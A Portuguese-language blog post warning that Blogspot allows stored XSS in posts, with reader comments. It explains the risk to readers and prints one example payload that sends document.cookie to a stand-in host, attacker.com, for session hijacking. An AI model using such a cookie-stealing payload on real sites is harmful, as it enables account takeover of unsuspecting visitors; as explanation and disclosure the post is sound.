Há bastante tempo tenho utilizado o meu próprio blog para
apresentar uma vulnerabilidade conhecida como Stored XSS.
O blogspot possui uma
vulnerabilidade onde é possível, para o administrador de um blog, postar
conteúdos com entradas maliciosas que permitem a execução de código javascript
no browser de qualquer usuário que visualize aquela postagem específica.
Muita gente gente pensa que o
XSS resume-se à execução de um mero "alert" através da entrada
<script>alert("Hello!");</script>
No entanto, isso é utilizado
apenas em demonstrações simples de XSS, mas não é utilizado em ataques que
visam obter algum tipo de retorno, como roubar o conteúdo dos cookies do
usuário, e através desse conteúdo, realizar um session hijacking, por exemplo.
Quando acessamos um blog,
pressupomos que o dono do blog quer compartilhar conteúdo, e não roubar
informações ou executar scripts malicioso no browser do usuário, mas nem sempre
isso é verdade. Somado à isso, ainda tempos outra situação: quando o blog de
alguém é comprometido (basta lembrar do que ocorreu com o blog do Coruja há
tempos atrás), e então o atacante insere chamadas maliciosas para a execução de
javascript, através das postagens no blog. E o administrador, como não tem o
hábito de rever o código HTML de suas postagens antigas (eu mesmo nunca fiz
isso), pode deixar passar essa situação, enquanto seus leitores estão sendo
atacados.
Precisamos lembrar também, que
um ataque do tipo XSS, pode ser completamente transparente para um usuário,
pois nada é exibido e apenas dados são roubados, ou operações realizadas
(redirecionamento, chamadas à .js maliciosos, clickjacking e etc). Por exemplo,
se um atacante injeta o código
<script>document.location=’http://banking.com/search?name=<script>document.write(“<img src=http://attacker.com/” + document.cookie + “>”)</script>’</script>
o usuário não sabe, mas o conteúdo de seus cookies estarão
sendo enviados para um outro local e armazenados, simplesmente porque
visualizou uma postagem. E se esse código for injetado no início de uma
postagem, o simples fato de ver aquele excerto que é exibido na página inicial
de blogs que exibem só um trecho da postagem, eles também terão seus cookies
comprometidos.
Logo, tomem cuidado com blogs
no blogspot.
Já enviei uma msg aos
administradores, mas até hj não tive nenhum resposta :-(
Puxa, como estamos expostos heim Luiz.
ResponderExcluirE que bom saber que o Blogspot "está interessado" na segurança do seu próprio serviço :)
Para vermos que mesmo sendo tão grande como o Google, segurança nem sempre vem em primeiro lugar :-)
ExcluirÉ verdade. E só para comentar, isso não acontece apenas na área de TI, acontece em outras também:
ResponderExcluirHá aproximadamente duas semanas, aqui em Sorocaba, caiu uma parede de 10m encima de uns 4 carros e uma moto - todos estavam com pessoas dirigindo. Essa parede era de um antigo prédio onde estava sendo construído um novo shopping. Os engenheiros disseram que a parede estava segura, e não precisava de escoramento. Bastou uma tempetade e pronto..
No final das contas, 7 pessoas morreram e um ficou ferido. E dois meses antes um amador filmou o local e disse que poderia cair aquela parede e ferir as pessoas, mas, como aconteceu com você, ninguém deu bola e deu no que deu.
#SóDeus!